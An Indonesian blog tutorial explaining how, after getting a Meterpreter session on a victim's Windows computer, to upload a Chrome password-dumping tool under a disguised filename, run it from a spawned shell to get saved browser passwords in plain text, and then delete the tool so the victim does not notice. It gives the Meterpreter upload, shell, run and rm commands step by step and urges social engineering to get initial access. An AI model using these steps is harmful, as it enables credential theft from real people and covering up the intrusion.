Dari hasil otak atik google tadi akhir nya saya punya ide untuk melakukan hal yang menarik ketika kita berhasil mendapatkan akses meterpreter di komputer korban. Yaitu kita bisa mendownlaod password yang tersimpan ( saved password ) di browser chrome mereka. Dan menariknya password ini output nya langsung plan text, tidak perlu di crack atau di hash lagi.
Pertama, kalian harus mendownload tools untuk melakukan melakukan dump password di chrome.
Download di Security Exploded . File nya masih berbentuk installer.
Atau kalau kalian ingin tools yang sudah ter ekstrak, kalian bisa mendownload nya disini :
Langkah langkah mendapatkan meterpreter saya anggap kalian sudah mengerti.
kalau masih bingung cari refrensi sebanyak banyak nya di google.
Atau baca artikel ini :
Kalau korban menggunakan OS Windows 7 keatas, pandai pandai lah bermain soceng.
Skip..
Saya anggap kalian sudah mendownload chrome password dumper diatas dan sudah masuk sesi meterpreter.
Upload Password Dumper nya dari lokal machine kita ke OS target.
meterpreter> upload /path/to/ChromePasswordDump.exe jembut.exe
Saya upload tools tadi di Desktop korban dengan nama jembut.exe
Selanjutnya, kita spawn cmd via meterpreter nya.
meterpreter> shell
Sekarang kita jalankan passsword dumper nya dengan perintah :
C:UsersUzumakiDesktop> jembut.exe ( sesuaikan dengan nama file yang kalian upload )
Ane test di VM, jadi saved password nya cuma satu, kalau kalian dapet target asli pasti result lebih banyak.
Gak etis kan kalo ane buat tutorial harus ngorbanin orang lain. Hehe.
Oke, kalo data sudah dapet semua, jangan lupa tools tadi dihapus agar korban gak curiga.
Keluar dulu dari cmd.
C:UsersUzumakiDesktop> exit
Lalu hapus dengan command
meterpreter > rm jembut.exe ( sesuaikan )
Kalau kurang jelas saya sudah buatkan video nya :
Nah sekian tutorial kali ini.
Share ke teman teman mu biar makin banyak yang mastah. *kidding
NB : saya membuat tutorial ini dengan tangan saya sendiri, kuota saya sendiri, screenshoot saya sendiri, dan ketikan saya sendiri. jadi yang mau copas tolong pengertiannya. Tidak susah kan memberi sumber link hidup ke post ini ?
ijin share om LinucSec ^-^
🙂
b-(